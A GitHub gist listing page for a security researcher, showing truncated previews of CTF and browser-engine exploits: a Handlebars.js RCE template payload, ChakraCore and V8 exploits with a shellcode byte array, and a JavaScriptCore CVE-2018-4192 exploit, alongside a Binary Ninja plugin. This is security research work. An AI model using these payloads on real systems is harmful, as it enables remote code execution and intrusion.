Skip to content

Instantly share code, notes, and snippets.

Amy itszn

Block or report user

Report or block itszn

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
itszn / solve1.html
Last active Nov 8, 2019
Easiest Crackme Solution
View solve1.html
<iframe src="" id="a"></iframe>
let i=0;
window.addEventListener("message", function(event) {
msg =;
console.log("attacker got ",msg);
if ( == 0) {
a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
} else if ( == 1) {
itszn / 0day.handlebars
Created Sep 16, 2019
handlebars.js rce 0day
View 0day.handlebars
//First we want to create an array
{{#with "a" as |str|}}
{{#with split as |list|}}
//Store some function that returns a truthy value into the array
//We use arrays to hold functions because handlebars will call functions
{{this.push this.toString}}
itszn / exploit.js
Last active Sep 18, 2019
Trendmicro CTF ChakraCore exploit
View exploit.js
let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];
let conva = new ArrayBuffer(8)
let convi = new Uint32Array(conva);
let convf = new Float64Array(conva);
function i2f(i) {
convi[0] = i%0x100000000;
convi[1] = i/0x100000000;
return convf[0];
itszn / jquery-latest.js
Created Jun 19, 2019
Twitter Tag Challenge
View jquery-latest.js
/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,,y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[]||"object":typeof e}var f="3.4.1",k=function(e,
itszn / exploit.js
Created Jul 11, 2018
Exploit for JavascriptCore CVE-2018-4192
View exploit.js
// Load Int library, thanks saelo!
// Helpers to convert from float to in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);
itszn / d8.js
Last active Sep 8, 2019
Plaid CTF 2018 d8 exploit
View d8.js
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */
/* ### Utils, thanks saelo ### */
// Tiny module that provides big (64bit) integers.
// Copyright (c) 2016 Samuel Groß
View gist:0eaac8657401d08f3b9d25ffc87875d7
itszn / exploit.html
Last active Sep 8, 2019
34c3ctf V9 Exploit
View exploit.html
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } }
var sc = [];
for (var i=0; i<0x480; i++) {
itszn /
Created Oct 16, 2017
Binary Ninja subleq plugin
from binaryninja import (Architecture, RegisterInfo, InstructionInfo,
InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext,
LowLevelILOperation, LLIL_TEMP,

Keybase proof

I hereby claim:

  • I am itszn on github.
  • I am itszn ( on keybase.
  • I have a public key ASAk2FcK4Zc6VAbULYP0m6uMVMTTBV1Cjr5QEL-4YsLlzgo

To claim this, I am signing this object:

You can’t perform that action at this time.